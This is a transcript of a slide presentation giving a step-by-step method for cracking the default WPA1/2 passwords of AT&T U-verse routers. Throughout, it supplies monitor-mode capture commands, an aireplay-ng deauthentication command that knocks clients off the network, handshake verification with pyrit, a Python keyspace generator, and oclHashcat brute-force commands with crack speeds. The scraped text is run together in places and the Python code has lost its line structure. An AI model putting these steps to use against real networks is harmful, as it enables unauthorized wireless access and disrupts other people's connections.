cracking at&t u-verse default wpa1/2 passwords
DESCRIPTION
Cracking AT&T U-verse Default WPA1/2 Passwords. . by Jason Wheeler Awesome blog: http://blog.init6.me E. Getting the Handshake. Aircrack's site has a pretty good tutorial. Boot from Back Track 5 R3 - PowerPoint PPT PresentationTRANSCRIPT
Cracking AT&T U-verse Default WPA1/2 Passwords.
by Jason WheelerAwesome blog: http://blog.init6.meE
Getting the Handshake
Aircrack's site has a pretty good tutorial.
Boot from Back Track 5 R3
First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.
#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0
#airmon-zc stop mon0
Start airmon-zc on the channel of the target.
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>
Deauthenticate a client#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Where:• -0 means deauthentication• 5 is the number of deauths to send• -a 00:14:6C:7E:40:80 is the MAC address of the access point• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are
deauthing• mon0 is the interface name
WPA Handshake
Verify 4-way Handshake
PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.
Verify 4-way Handshake
The easy way......
#pyrit -r <FILENAME>.pcap analyze
Strip out the junk.
#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip
CAP-2-HCCAPTo turn your pcap file into a hashcat-plus friendly file you can upload it
to https://hashcat.net/cap2hccap/
CRACK!!
Python Scriptimport sys
MAX_INT = 9999999999BAD_PATTERNS = {x * 3 for x in '0123456789'}
for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )
Hashcat-plus$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0
<filename>.hccap --gpu-accel=160 --gpu-loops=1024
88,770 c/s real or
$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1
114K c/s real
sourceshttp://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/